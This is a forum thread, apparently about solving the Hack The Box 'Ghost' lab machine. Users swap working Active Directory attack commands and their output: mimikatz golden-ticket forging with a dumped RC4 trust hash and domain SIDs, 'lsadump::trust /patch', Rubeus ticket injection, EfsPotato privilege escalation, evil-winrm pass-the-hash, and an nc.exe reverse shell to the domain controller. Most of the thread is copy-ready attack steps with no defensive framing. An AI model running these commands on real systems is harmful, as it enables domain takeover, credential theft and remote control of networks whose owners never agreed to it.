Posts: 124
Threads: 1
Joined: Apr 2024
(Jul 15, 2024, 12:15 PM)mazafaka555 Wrote: (Jul 15, 2024, 11:35 AM)jsvensson Wrote: (Jul 15, 2024, 11:19 AM)bmoon10 Wrote: (Jul 15, 2024, 11:02 AM)spamdegratis5 Wrote: (Jul 15, 2024, 10:58 AM)bmoon10 Wrote: with mimikatz golden ticket can be obtained using ghost$ rc4 hash and corp.ghost.htb and ghost.htb sids.
Yeah, I know, but every ticket returns the error (both, nthash and aeskey) [-] Kerberos SessionError: KDC_ERR_TGT_REVOKED(TGT has been revoked)
Looking for a possible cause, maybe this is related? https://github.com/fortra/impacket/issues/1601
Quote:When using NTLM hash of KRBTGT and Impacket's ticketer, you will need the "-user-id" flag.
Example:
impacket-ticketer -nthash $HASH -domain-sid $DOMAIN SID -domain $DOMAIN -user-id $IDofUSER $NameOfUser
To get the user-id, you just need to use Mimikatz or others like WMIC ("wmic useraccount where name='joe' get sid")
Quote:That is because Windows from the update KB5008380 got a new PAC structure and a new check: KDC now checks if the user actually exists with the right RID. So now you need to make a ticket for an existing user with right RID with the flag -user-id as earlesshoichi mentioned before.
I'll try with an existing user
Not sure from where you are getting the ghost$ rc4 hash, i've used the ghost$ rc4 hash from the meterpreter hashdump command for getting the golden ticket (with mimikatz for tgt and Rubeus.exe for tgs and it worked)
Yep it worked, I could read user.txt and root.txt. But how to get to dc01 with shell? i tryied psexec but it fails.
One of the usual possibilities with Cobal Strike -- once you got full access to the dc, you may upload your payload via smb and spawn it remotely to get access to the DC.
https://www.youtube.com/watch?v=dDAz13wmCk8
https://www.youtube.com/watch?v=GI-vvX_OBd4
https://www.youtube.com/watch?v=QuU_u-yu8Lc
Don't have Cobalt Strike but finally got stabile shell.
using psexec downloaded nc.exe to dc
after that with psexec run nc to get shell but it get kill after a while so from that shell again run nc.exe and get another shell it will not be killed 
Posts: 5
Threads: 0
Joined: Jun 2024
Jul 15, 2024, 12:34 PM
(This post was last modified: Jul 15, 2024, 12:43 PM by r9967252.)
(Jul 15, 2024, 12:09 PM)bmoon10 Wrote: (Jul 15, 2024, 12:02 PM)myhem Wrote: (Jul 15, 2024, 11:49 AM)osamy7593 Wrote: In 10.0.0.10
kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi
.\rubeus.exe asktgs /ticket:golden.kirbi /service:cifs/DC01.ghost.htb /dcC01.ghost.htb /ptt /nowrap
dir \\DC01.ghost.htb\C$
im still getting error, could you please tell which commands you used?
dir \\DC01.ghost.htb\C$ returns access denied if there are issues in the tickets.
if both tgt, tgs works properly you won't face issues with the dir command.
me too getting access denied error, below are my commands, i don't think there is anything mis-typed, please help
.\mimikatz "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit
.\Rubeus.exe asktgs /ticket:golden.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt
.\Rubeus.exe ptt /ticket:golden.kirbi
dir \\dc01.ghost.htb\c$
nvm, need to do this first
.\mimikatz "lsadump::trust /patch" exit
Posts: 6
Threads: 0
Joined: May 2024
(Jul 15, 2024, 12:01 AM)osamy7593 Wrote: (Jul 14, 2024, 10:22 PM)imassxck Wrote: (Jul 14, 2024, 10:04 PM)osamy7593 Wrote: what after proxychains4 evil-winrm -i 10.0.0.10 -u 'Administrator' -H '41515af3ada195029708a53d941ab751'
(Jul 14, 2024, 10:02 PM)imassxck Wrote: I tried using PrintSpoofer because the mssqlserver has SeImpersonatePrivilege, but I couldn't upload PrintSpoofer.
use efs potato to get system
https://github.com/zcgonvh/EfsPotato --> move EfsPotato.cs to the target machine
C:\Windows\Microsoft.Net\Framework\v4.0.30319\csc.exe EfsPotato.cs -nowarn:1691,618
./EfsPotato.exe 'whoami'
Thank you. But when I run
./EfsPotato.exe 'cmd'
it crashes.
Use nc.exe -nv ip port -e cmd.exe
Whenever i tried to run the nc.exe it will say `The system cannot execute the specified program.`
Posts: 20
Threads: 4
Joined: Jun 2024
(Jul 15, 2024, 12:34 PM)r9967252 Wrote: (Jul 15, 2024, 12:09 PM)bmoon10 Wrote: (Jul 15, 2024, 12:02 PM)myhem Wrote: (Jul 15, 2024, 11:49 AM)osamy7593 Wrote: In 10.0.0.10
kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi
.\rubeus.exe asktgs /ticket:golden.kirbi /service:cifs/DC01.ghost.htb /dcC01.ghost.htb /ptt /nowrap
dir \\DC01.ghost.htb\C$
im still getting error, could you please tell which commands you used?
dir \\DC01.ghost.htb\C$ returns access denied if there are issues in the tickets.
if both tgt, tgs works properly you won't face issues with the dir command.
me too getting access denied error, below are my commands, i don't think there is anything mis-typed, please help
.\mimikatz "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit
.\Rubeus.exe asktgs /ticket:golden.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt
.\Rubeus.exe ptt /ticket:golden.kirbi
dir \\dc01.ghost.htb\c$
nvm, need to do this first
.\mimikatz "lsadump::trust /patch" exit
[*]
[*]Action: Ask TGS
.
.
[*]Using domain controller: dc01.ghost.htb (10.10.11.24)
[X] KRB-ERROR (31) : KRB_AP_ERR_BAD_INTEGRITY
im getting this error This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Selling in HTB
Posts: 4
Threads: 0
Joined: Jun 2024
(Jul 15, 2024, 12:34 PM)r9967252 Wrote: (Jul 15, 2024, 12:09 PM)bmoon10 Wrote: (Jul 15, 2024, 12:02 PM)myhem Wrote: (Jul 15, 2024, 11:49 AM)osamy7593 Wrote: In 10.0.0.10
kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi
.\rubeus.exe asktgs /ticket:golden.kirbi /service:cifs/DC01.ghost.htb /dcC01.ghost.htb /ptt /nowrap
dir \\DC01.ghost.htb\C$
im still getting error, could you please tell which commands you used?
dir \\DC01.ghost.htb\C$ returns access denied if there are issues in the tickets.
if both tgt, tgs works properly you won't face issues with the dir command.
me too getting access denied error, below are my commands, i don't think there is anything mis-typed, please help
.\mimikatz "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit
.\Rubeus.exe asktgs /ticket:golden.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt
.\Rubeus.exe ptt /ticket:golden.kirbi
dir \\dc01.ghost.htb\c$
nvm, need to do this first
.\mimikatz "lsadump::trust /patch" exit
Will you able to access $C ?
Im getting access denied, even I have reset the box and tried
Posts: 44
Threads: 3
Joined: Nov 2023
(Jul 15, 2024, 12:34 PM)r9967252 Wrote: (Jul 15, 2024, 12:09 PM)bmoon10 Wrote: (Jul 15, 2024, 12:02 PM)myhem Wrote: (Jul 15, 2024, 11:49 AM)osamy7593 Wrote: In 10.0.0.10
kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi
.\rubeus.exe asktgs /ticket:golden.kirbi /service:cifs/DC01.ghost.htb /dcC01.ghost.htb /ptt /nowrap
dir \\DC01.ghost.htb\C$
im still getting error, could you please tell which commands you used?
dir \\DC01.ghost.htb\C$ returns access denied if there are issues in the tickets.
if both tgt, tgs works properly you won't face issues with the dir command.
me too getting access denied error, below are my commands, i don't think there is anything mis-typed, please help
.\mimikatz "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit
.\Rubeus.exe asktgs /ticket:golden.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt
.\Rubeus.exe ptt /ticket:golden.kirbi
dir \\dc01.ghost.htb\c$
nvm, need to do this first
.\mimikatz "lsadump::trust /patch" exit
[*]Action: Ask TGS
[*]Using domain controller: dc01.ghost.htb (10.0.0.254)
[*]Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*]Building TGS-REQ request for: 'CIFS/dc01.ghost.htb'
[X] KRB-ERROR (68) : KDC_ERR_WRONG_REALM
i believe domain sid on mimikatz is wrong, how can i enumerate that?
Posts: 16
Threads: 1
Joined: May 2024
(Jul 15, 2024, 01:25 PM)eunaosei Wrote: (Jul 15, 2024, 12:34 PM)r9967252 Wrote: (Jul 15, 2024, 12:09 PM)bmoon10 Wrote: (Jul 15, 2024, 12:02 PM)myhem Wrote: (Jul 15, 2024, 11:49 AM)osamy7593 Wrote: In 10.0.0.10
kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi
.\rubeus.exe asktgs /ticket:golden.kirbi /service:cifs/DC01.ghost.htb /dcC01.ghost.htb /ptt /nowrap
dir \\DC01.ghost.htb\C$
im still getting error, could you please tell which commands you used?
dir \\DC01.ghost.htb\C$ returns access denied if there are issues in the tickets.
if both tgt, tgs works properly you won't face issues with the dir command.
me too getting access denied error, below are my commands, i don't think there is anything mis-typed, please help
.\mimikatz "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit
.\Rubeus.exe asktgs /ticket:golden.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt
.\Rubeus.exe ptt /ticket:golden.kirbi
dir \\dc01.ghost.htb\c$
nvm, need to do this first
.\mimikatz "lsadump::trust /patch" exit
[*]Action: Ask TGS
[*]Using domain controller: dc01.ghost.htb (10.0.0.254)
[*]Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*]Building TGS-REQ request for: 'CIFS/dc01.ghost.htb'
[X] KRB-ERROR (68) : KDC_ERR_WRONG_REALM
i believe domain sid on mimikatz is wrong, how can i enumerate that?
Domain SID is good. User SID is wrong.
You can get some infos like that :
wmic useraccount get name,sid
Posts: 4
Threads: 0
Joined: Jun 2024
This my ticket, But I can't access $C in dc, Im getting Access denied
Current LogonId is 0:0x320f62
Cached Tickets: (1)
#0> Client: Administrator @ CORP.GHOST.HTB
Server: cifs/DC01.ghost.htb @ GHOST.HTB
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
Start Time: 7/15/2024 8:27:42 (local)
End Time: 7/15/2024 18:27:42 (local)
Renew Time: 7/22/2024 8:27:42 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:
Posts: 144
Threads: 9
Joined: Oct 2023
humm, why its getting hard rn  This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Selling/posting credit/debit cards is not allowed. It may be posted if it's a part of a database.
Posts: 6
Threads: 0
Joined: Nov 2023
(Jul 15, 2024, 02:55 PM)metasan Wrote: (Jul 15, 2024, 01:25 PM)eunaosei Wrote: (Jul 15, 2024, 12:34 PM)r9967252 Wrote: (Jul 15, 2024, 12:09 PM)bmoon10 Wrote: (Jul 15, 2024, 12:02 PM)myhem Wrote: im still getting error, could you please tell which commands you used?
dir \\DC01.ghost.htb\C$ returns access denied if there are issues in the tickets.
if both tgt, tgs works properly you won't face issues with the dir command.
me too getting access denied error, below are my commands, i don't think there is anything mis-typed, please help
.\mimikatz "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit
.\Rubeus.exe asktgs /ticket:golden.kirbi /dc:dc01.ghost.htb /service:CIFS/dc01.ghost.htb /nowrap /ptt
.\Rubeus.exe ptt /ticket:golden.kirbi
dir \\dc01.ghost.htb\c$
nvm, need to do this first
.\mimikatz "lsadump::trust /patch" exit
[*]Action: Ask TGS
[*]Using domain controller: dc01.ghost.htb (10.0.0.254)
[*]Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*]Building TGS-REQ request for: 'CIFS/dc01.ghost.htb'
[X] KRB-ERROR (68) : KDC_ERR_WRONG_REALM
i believe domain sid on mimikatz is wrong, how can i enumerate that?
Domain SID is good. User SID is wrong.
You can get some infos like that :
wmic useraccount get name,sid
metasan is right, the user SID is wrong, use wmic useraccount get name,sid and use the SID for krbtgt to properly set the ticket. Once that's done correctly you can dir \\dc01.ghost.corp\c$ without issue. It took a bit of playing around (mine was \mimikatz.exe "kerberos::golden /user:Administrator /domain:CORP.GHOST.HTB /sid:S-1-5-21-2034262909-2733679486-179904498-502 /sids:S-1-5-21-4084500788-938703357-3654145966-519 /rc4:dae1ad83e2af14a379017f244a2f5297 /service:krbtgt /target:GHOST.HTB /ticket:golden.kirbi" exit) and then everything worked.
|
